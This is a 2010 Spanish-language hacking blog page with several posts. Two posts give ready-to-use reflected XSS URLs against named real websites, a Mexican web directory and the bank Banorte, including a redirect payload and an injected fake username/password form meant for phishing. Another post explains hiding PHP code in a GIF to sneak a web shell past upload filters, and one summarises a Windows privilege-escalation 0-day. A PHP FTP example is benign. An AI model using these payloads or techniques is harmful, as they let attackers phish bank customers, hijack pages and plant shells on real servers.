Gol14th





Sobre este blog:





Blogroll: 16

[x] Agregar a gol14th

hkm hkm
darkspark darkspark
xianur0 xianur0
ipkiss ipkiss
maztor maztor
duff duff
benox benox
xzite xzite
1410 1410
jamz jamz
habbingo habbingo

... Ver todos

Perfil de gol14th

[x]Nick: gol14th
Rango: Master
País: ch
Visitas: 121298
Votos: 127
En Blogrolls: 52
Status: PM

Patrocinadores:


Anuncia aquí

XSS vulnerability Mexico Web

Publicado el 22/02/2010 12:02:00 en Bug Report.



http://www.mexicoweb.com.mx/busca/buscador.cgi?query=%3Cscript%3Ealert%28%27XSS+By+Gol14th%27%29%2Calert%28%27Estamos+Buscandote.....%27%29%2Calert%28%27Ip..........%27%29%2Calert%28%27Mexico%2C+Argentina...%27%29%2Calert%28%27Virtux+es+gay%27%29%2Calert%28%27Saludos+que+esten+bien%27%29%3B%3C%2Fscript%3E

http://www.mexicoweb.com.mx/busca/buscador.cgi?query=%27%22%3E%3C/title%3E%3Cscript%3Ealert%28QUE%20HACES?%29%3C/script%3E%27%22%3E%3Cmarquee%3E%3Ch1%3EXSS%20By%20Gol14th%3C/h1%3E%3C/marquee%3E


Comentarios: 9 | Leer comentarios

[x] XSS vulnerability Banorte: El Banco Fuerte de Mexico

Publicado el 11/02/2010 12:02:00 en Bug Report. Total de votos: 12  Votar






Menssajebox

http://www.banorte.com:80/portal/banorte.portal?trends=%3C%2Fscript%3E%3Cscript%3Ealert%28%22By+Gol14th%22%29%3B%3C%2Fscript%3E%3Cscript%3E

Redirect

http://www.banorte.com:80/portal/banorte.portal?trends=%3C%2Fscript%3E%3Cscript%3Edocument.location%3D%22http%3A%2F%2Fvirtux.diosdelared.com%2F%22%3C%2Fscript%3E%3Cscript%3E

Phishing

http://www.banorte.com:80/portal/banorte.portal?trends=%3C%2Fscript%3E%3Cscript%3Edocument.write%28%27%3Cp%3EPlease+login%3A%3C%2Fp%3E%3Cform+method%3D%22GET%22+action%3D%22http%3A%2F%2Fwww.google.ch%22%3E%3Cp%3EUsername+%3A+%3Cinput+type%3D%22text%22+name%3D%22val1%22+%2F%3E%3C%2Fp%3E%3Cp%3EPassword+%3A+%3Cinput+type%3D%22text%22+name%3D%22val2%22+%2F%3E%3C%2Fp%3E%3Cinput+type%3D%22submit%22+%2F%3E%3C%2Fform%3E%27%29%3B%3C%2Fscript%3E%3Cscript%3E


By Gol14th

Vota!




Comentarios: 19 | Leer comentarios

[x] Programando en [PHP] - Conectado a un servidor FTP

Publicado el 05/02/2010 12:02:00 en Programación Web. Total de votos: 11  Votar

Para empezar, debido a su simplicidad, quiero hablar de cómo conectar a un servidor ftp y enviar comandos.

Sería el siguiente:

//intentamos hacer loggin como usuario anónimo al servidor de microsoft
$ftp_server = "ftp.microsoft.com";
$ftp_user_name = "anonymous";
$ftp_user_pass = "anonymous@hotmail.com";


// conectamos
// si falla, da error y termina
$conexion = ftp_connect($ftp_server) or die("la conexion FTP ha fallado");

// ahora enviamos el usuario y el password
// el password para el usuario anonimo es un mail cualquiera
$login_result = ftp_login($conexion, $ftp_user_name, $ftp_user_pass);

//
if (!$login_result) {
echo "ftp abierto pero no admite usuario anonimo";
exit;
} else {
echo "conectado a $ftp_server como anonimo" . "\r\n";

//para comprobarlo, listamos los contenidos del directorio actual
// primero cambiamos a modo pasivo y luego hacemos el "list"
// el resultado nos es devuelto en un array
// el número de elementos de un array se calcula con count()
ftp_pasv($conexion, true);
$listado=ftp_nlist($conexion, ".");
$nelementos=count($listado);

for ($i=0; $i<$nelementos; ++$i)
echo $listado[$i] . "\r\n";

}


// terminado, cerramos conexión
ftp_close($conexion);


y aca una lista de comandos FTP

Comentarios: 14 | Leer comentarios

[x] * EXPLOIT [0 day] Para todas las versiones de Microsoft

Publicado el 20/01/2010 12:01:00 en Hacking General. Total de votos: 20  Votar



Se han publicado los detalles de una grave vulnerabilidad en todas las
versiones de Windows que permite elevar privilegios en el sistema. No
existe parche disponible y el exploit está al alcance de cualquiera,
lo que lo convierte en un serio "0 day" para Microsoft.

Tavis Ormandy, reputado investigador de seguridad que ha encontrado
numerosos fallos de seguridad en diferentes programas, ha publicado
un exploit para una vulnerabilidad que permite elevar privilegios en
Windows. Se trata de un fallo de diseño que arrastran todos los Windows
de 32 bits (basados en tecnología NT) desde 1993. Esto va desde el NT
hasta Windows 7, pasando por 2000, 2003, 2008, XP y Vista.

El fallo reside en el soporte heredado de aplicaciones de 16 bits. No
se valida correctamente el cambio de contexto y pila que se efectúa al
llamar al manejador GP trap. Windows comete algunos errores y asume
incorrectamente que:

* Se requiere el privilegio SeTcbPrivilege para configurar un contexto
VDM (Virtual DOS Machine) .
* Código en ring3 no puede instalar selectores de segmento de código
arbitrarios. Usando el modo Virtual-8086, es posible.
* Código alojado en el ring3 (espacio de usuario) no puede falsificar
un "trap frame".

Ormandy consigue eludir estas cuestiones, y el resultado es que un
usuario puede realizar un cambio de contexto en el núcleo y ejecutar
código como SYSTEM, el máximo privilegio en el sistema.

Para eludir el tercer punto, se necesita acceder a una dirección de
memoria, que es siempre la misma en todos los Windows menos Vista y
Windows 7 que realizan una "aleatorización" de la carga en memoria. Se
supone que esto protege de este tipo de ataques. Sin embargo, usando
NtQuerySystemInformation(), se puede llegar a calcular dónde está esa
dirección aunque sea diferente en cada inicio, con lo que la protección
ASLR (Address space layout randomization) también se ve eludida.

Ormandy avisó a Microsoft en junio de 2009, y poco después confirmaron
el problema. Harto de que no publicasen una solución (que considera no
muy compleja), ha decidido hacer público el fallo. Él mismo entiende que
esta vulnerabilidad afecta de forma más seria a empresas y corporaciones
que mantienen a sus usuarios con privilegios limitados. Por desgracia,
la mayoría de usuarios caseros utilizan ya la cuenta de administrador
en su Windows (no tan poderosa como SYSTEM, pero equivalente a efectos
prácticos) para tareas cotidianas, con lo que la elevación de
privilegios no suele ser un requisito en los ataques.

El exploit ha sido probado y funciona a la perfección. La buena noticia
es que es relativamente sencillo mitigar el problema. Incluso ha
p...

Continúa aquí...

Comentarios: 28 | Leer comentarios

[x] Ejecundo el codigo desde un Archivo GIF

Publicado el 19/12/2009 12:12:00 en Hacking Web. Total de votos: 11  Votar

Cuando encotramos sitios que solo nos permiten subir imágenes a la web pero no se nos permite subir PHP por que se podría subir una Shell

Material

* Un cualquier imagen
* la abrimos con un editor, por ejemplo Notepad
* al final del archivo, pegamos el código php separado por un ; checa imagen....





Y la imagen se visualiza normalmente el Usuario no se dará cuenta, aunque el método no es muy eficaz!!






Comentarios: 12 | Leer comentarios
Ver: Siguientes 5



Powered by Diosdelared.com CMS Blogs
© Diosdelared 2009